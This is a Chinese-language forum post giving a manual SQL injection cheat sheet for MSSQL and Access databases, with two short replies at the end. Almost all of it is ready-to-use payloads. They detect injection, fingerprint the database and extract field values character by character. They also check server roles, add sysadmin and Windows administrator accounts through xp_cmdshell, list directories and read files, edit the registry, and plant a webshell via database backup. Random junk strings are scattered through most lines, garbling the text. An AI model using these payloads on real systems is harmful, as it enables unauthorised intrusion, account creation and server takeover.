手动方式SQL注入脚本命令

1.判断是否有注入;and 1=1 ;and 1=2 id,'+<  
　　2.初步判断是否是mssql ;and user>0 p! k~ufU  
vMY!Z1.*  
　　3.注入参数是字符'and [查询条件] and ''=' {^Q,G x(  
tW!*W?  
　　4.搜索时没过滤参数的'and [查询条件] and '%25'=' Ze/\IBd  
le_aIbB"P  
　　5.判断数据库系统 leF!Uog  
!5'4FUlJ  
　　;and (select count(*) from sysobjects)>0 mssql h}tC+_"D  
W2%@}IDm  
　　;and (select count(*) from msysobjects)>0 access ;I@\}!%H  
Y9-F\t=~  
0`V=x+*,  
P(-   
　　6.猜数据库 ;and (select Count(*) from [数据库名])>0 {\k }:)  
#Mk3cp^Yl  
　　7.猜字段 ;and (select Count(字段名) from 数据库名)>0 k&L/JzzI  
G]$EIf'  
　　8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 1.N2!:&G|  
n5oX51J  
　　9.(1)猜字段的ascii值(access) [CI0N I6F  
com4@NK  
　　;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 2&pE  
9,&xG\z=  
　　(2)猜字段的ascii值(mssql) o&M
.9V?~~  
LRaO}-<b  
　　;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 V^!^wLLi
 
d"E3ypPK  
　　10.测试权限结构(mssql) T#6g5Jnsp  
g
[O  
}
(DH_0  
\N-3JOVy  
　　;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 2( I4h[  
;"#yHP`  
　　;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- #Muh|P]%\  
R-<8j`[0  
　　;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ? [5>
!  
KiFTj$w,  
　　;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- CAx eJ`Q  
_E8Cvaob  
　　;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- m6^#pqSL  
d@$bPQQ$,  
　　;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- h{zb)'R  
_iDVd2X"H  
　　;and 1=(select IS_MEMBER('db_owner'));-- O#):*II`9  
*_J{_7pwe  
FG!hb?_1  
EbX!;z  
　　11.添加mssql和系统的帐户 NX8hFwR  
oC} u  
　　;exec master.dbo.sp_addlogin username;-- }CZw'fhVWO  
　　;exec master.dbo.sp_password null,username,password;-- m]}U!XT  
tcRJ1:d  
　　;exec master.dbo.sp_addsrvrolemember sysadmin username;-- n'q:L(`M  
{_Ll'S  
　　;exec master.dbo.xp_cmdshell 'net user username password O^6anUV0  
?EHheZ{  
　　/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 4W49*Je  
Og@{6>  
　　;exec master.dbo.xp_cmdshell 'net user username password /add';-- 6ce-92n  
|'P$zMAF  
　　;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- %,<Ki]F  
mvTp,^1  
5a@9PX^.J  
M=&,+#z<V  
　　12.(1)遍历目录 [dz3k@ >0  
@OFxnF`
 
　　;create table dirs(paths varchar(100), id int) S-3hLw&?  
kw#-\RR_c  
　　;insert dirs exec master.dbo.xp_dirtree 'c:\' S3WUccv  
YAeF*vP  
　　;and (select top 1 paths from dirs)>0 F&7|`o3  
u^JsKG+,:  
　　;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ,LSiQmV5  
gJ9"$fIPc  
'DpJ#w\81  
h7T),UL  
　　(2)遍历目录 [.Kp/,JY  
liLhvcd  
　　;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- "dDrw ]P;  
　　;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
T,>L  
WK7?~R%rq  
　　;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 q TN)2G   
cL03V?} ~  
　　;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 jf)l; \u  
SA=>9L,2  
　　;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 5E~^-
wX  
:lvBcFw  
^[Ka+E^Q  
-<5{wQE;|  
　　13.mssql中的存储过程 BbCO K  
3/Z>W|w#w  
　　xp_regenumvalues 注册表根键, 子键 /T(9:1/G  
'U`;4AN  
　　;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 rJCb8x+5a  
|K-
`  
　　xp_regread 根键,子键,键值名 {N/%%O.b  
4G&dBH  
　　;exec xp_regread r@Jy*2[-Jq  
nQ_{IO8/6W  
　　'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 0('ec60u  
g; ]'  
　　xp_regwrite 根键,子键, 值名, 值类型, 值 u5g
lKE  
7X/t2Vih
@  
　　值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 zhFm2  
y*-_  
　　;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 L*A-&9.p3  
bDtb6hL  
　　xp_regdeletevalue 根键,子键,值名 bP#!U'b"=  
wB \`3u4  
　　exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 p&]V!O  
"z3rH~q72  
　　xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 qa )BbK^i  
?&~q^t?u  
C
gh84 2%  
1nskf*Z  
　　14.mssql的backup创建webshell
Y-YuY  
DyGls8<\!  
　　use model  G7al@  
}F_c0zM  
　　create table cmd(str image); %KT}Map  
e}d(.H%l0  
　　insert into cmd(str) values (''); G`>]ng  
wL 4Y%g  
　　backup database model to disk='c:\l.asp'; A&
~fw^HM  
~S\L(B(  
d`B<\Y#{Us  
S\&3t}_  
　　15.mssql内置函数 %sr- xE  
G,|!&=Pe|E  
　　;and (select @@version)>0 获得Windows的版本号 U"p</
Q  
\?^2}K/  
　　;and user_name()='dbo' 判断当前系统的连接用户是不是sa tMiIlf!>p  
PKSfu++Z  
　　;and (select user_name())>0 爆当前系统的连接用户 4#03x:/<\  
y-1e(:GF  
　　;and (select db_name())>0 得到当前连接的数据库 l_+@Xpl  
i!?gga  
m3lz#Pm'0  
qEST[S V  
　　16.简洁的webshell eNAxVF0  
UGhEaKH~R  
　　use model e;6KxvX~  
JL= c
IH8  
　　create table cmd(str image); =W.}&  
.w.:o2L  
　　insert into cmd(str) values (''); f`uRC-B/  
.="XvVdkp  
　　backup database model to disk='g:\wwwtest\l.asp';

学习.......... 呵呵 我是好人

这个和好人有关系吗？